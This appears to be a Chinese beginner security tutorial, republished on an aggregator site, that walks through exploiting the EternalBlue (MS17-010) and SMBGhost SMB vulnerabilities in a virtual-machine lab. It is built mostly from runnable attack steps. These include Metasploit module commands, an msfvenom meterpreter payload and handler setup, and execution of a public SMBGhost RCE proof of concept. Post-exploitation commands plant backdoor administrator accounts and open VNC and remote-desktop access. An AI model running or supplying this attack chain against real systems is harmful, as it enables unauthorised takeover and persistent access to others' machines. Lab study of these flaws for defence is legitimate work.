网安-入门永恒之蓝/黑

这篇具有很好参考价值的文章主要介绍了网安-入门永恒之蓝/黑。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

永恒之蓝

实验环境:win7,kali

实验目的:拿到win7管理员权限

扫描该网段 nmap -sP 192.168.164.0/24,查看win7ip,也可在win7上查询

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

扫描端口,445,永恒之蓝是通过445端口进行攻击的

masscan --rate=10000 -p1-65535 192.168.164.128

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

测试连通性,互相ping通

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

输入命令masfconsole,进入框架

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

输入命令search ms17-010(永恒之蓝漏洞代码,可以百度查)

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

0是攻击,3是监测是否可以攻击

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

先进行检测 命令:use 3

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

输入options,填写参数(标注为yes的都是必填项)

可以看到RHOSTS(攻击对象ip)没有参数

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

命令set rhosts 192.168.164.128,将参数填入

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

由于,我的虚拟机win7不存在此漏洞所以我就不进行下去了。后面步骤就是use 0或  use exploit/windows/smb/ms17_010_eternalblue 进行攻击,将必填参数填写,最后输入run命令执行就可进入win7

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

获得shell控制台:shell,成功后输入shell就可,显示转到C:\Windows\system32目录下,说明已经获得了shell的控制权。

获得后可以,通过命令创建管理员用户就可直

进行后门植入(创建新的管理员账户)

      net user hack 123456 /add        //在windows 7上创建一个hack的用户,以便下次访问

      net localgroup administrators hack /add     //将hack加入到windows 7的本地管理员组中,以便获得更大权限

      net user        //查看windows 7本地用户

      net localgroup administrators       //查看windows 7本地管理员

在kali中输入 run vnc 可进入win7桌面(可显示)

更多命令可百度。

永恒之黑

漏洞原理:

SMB远程代码执行漏洞

SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。

利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

漏洞验证之蓝屏攻击

实验环境:win10永恒之黑漏洞版,关闭防火墙

将软件解压缩win+r,cmd,将软件拖入shell,根据提示输入win10ip。

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

利用漏洞开始攻击

实验环境:win10永恒之黑漏洞版,kali

ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/

生成反向连接木马

命令 msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

输入命令:msfconsole进入框架

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

开启kali监听

依次执行下面命令

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp(刚刚替换的shellcode,后门)

set lport 8888(端口)

set rhost 192.168.164.132(win10ip)

run

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

新建窗口

将SMBGhost_RCE_PoC-master复制到root目录下

命令:cp -r '/home/kali/Desktop/SMBGhost_RCE_PoC-master' '/root/'

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

进入SMBGhost_RCE_PoC-master

命令:cd /root/SMBGhost_RCE_PoC-master

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

命令:python exploit.py -ip 192.168.164.132

到倒数第二行后,需要随便摁一个键执行

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

发现win10蓝屏了攻击成功

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

继续利用此漏洞做出更多,上一步蓝屏可能不会出现meterpreter(会话),可以ctrl+c结束第一个窗口,然后再次run,第二个窗口再次执行python exploit.py -ip 192.168.164.132,不成功就重复此操作(看运气)

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

输入shell进入win10的doc界面

exit可退出

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

命令:net user abc 1 /add

创建新用户abc,密码为1

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

将用户abc加入到管理员组

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

发现win10成功添加了abc用户

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

exit推出shell

run vnc进入win10桌面(前提win10没开防火墙)

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

开启win10远程桌面功能

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

返回真实机win+r输入mstsc(远程登录),输入win10ip,以abc账户登录(有个缺点需要返回win10确定,但是学习实验够了)

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器

网安-入门永恒之蓝/黑,网安入门,linux,运维,服务器文章来源地址https://www.toymoban.com/news/detail-800952.html

到了这里,关于网安-入门永恒之蓝/黑的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 永恒之蓝全过程复现

    一,永恒之蓝简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒, 英国

    2024年02月12日
    浏览(43)
  • 永恒之蓝(ms17010)漏洞利用

    目录 1.启动msf 2.检查msf库里是否存在ms17-010漏洞 3.扫描靶机开放端口 4.配置目标ip,本地ip并利用exploit进行攻击

    2024年02月11日
    浏览(42)
  • MS17010(永恒之蓝)漏洞实战

    曾因苦难多壮志,不教红尘惑坚心。 使用搜索命令,搜索ms17_010 search ms17_010 搜索网段中主机漏洞 use auxiliary/scanner/smb/smb_ms17_010 照例,show options 看一下配置 设置网段,run运行就行了 使用攻击模块 查看所需要的配置show options 开始配置payload、渗透地址、监听地址 开始攻击输入

    2024年02月07日
    浏览(36)
  • 漏洞复现-永恒之蓝(MS17-010)

    目录 一,漏洞介绍 1,永恒之蓝是什么? 2,漏洞原理 3,影响版本 二,实验环境 三,漏洞复现 四,利用exploit模块进行渗透          永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”

    2024年02月13日
    浏览(73)
  • ms17-010(永恒之蓝)漏洞复现

    目录 前言 一、了解渗透测试流程  二、使用nmap工具对win7进行扫描 三、尝试ms17-010漏洞利用 四、结果展示 总结 🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。 💡本文由Filotimo__✍️原创,首发于CSDN📚。 📣如需转载,请事先与我联系以获得授

    2024年02月09日
    浏览(37)
  • 永恒之蓝(MS17-010)漏洞复现

    目录 漏洞简介 漏洞描述 影响版本 复现环境 攻击机 IP:192.168.109.132 靶机 IP:192.168.109.130 开启远程设置 卸载全部安全补丁 复现过程 一、主机发现 二、打开metasploit工具 三、使用msf搜寻MS17-010漏洞 四、使用MS17-010扫描模块,对靶机进行扫描 1.使用扫描模块 2.查看模块需要配置

    2024年02月13日
    浏览(47)
  • 复现永恒之蓝[MS17_010]

    目录 准备靶机 测试ping连通性 攻击漏洞 利用漏洞 1台kali,1台win7 win7系统可以在MSDN镜像网站里获取 注:将win7安装好,win7无法安装vmtools,若升级系统,可能会把永恒之蓝补丁打上,所以建议别升级系统     win7的IP地址为192.168.164.129  kali的IP地址为192.168.164.130 将这两台机器互

    2024年02月01日
    浏览(34)
  • 永恒之蓝漏洞原理及漏洞复现

    摘要 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个

    2024年02月03日
    浏览(84)
  • 永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 环境 信息收集 先扫描目标靶机IP 进入MSF查看是否存在永恒之蓝的漏洞 攻击 攻击机:kali 靶机:Windows Server 2008 对ip进行收集开放什么端口 先扫描目标靶机IP 因为在同一个内网之中 所以可以使用arp-scan -l 进行查询 知道目标靶机IP(192.168.162.146)来进

    2024年03月25日
    浏览(51)
  • 【ms17-010】永恒之蓝漏洞复现

    准备工作 攻击机:kali,ip:192.168.56.128 靶机:windows server 2003,ip:192.168.56.132 工具:nmap(扫描)、msf 漏洞利用 首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况 此时已经扫描出来了,ip为: 192.168.56.132 的主机开启,并且显示了开放的端口号。 然后我们可以使用:

    2024年01月19日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包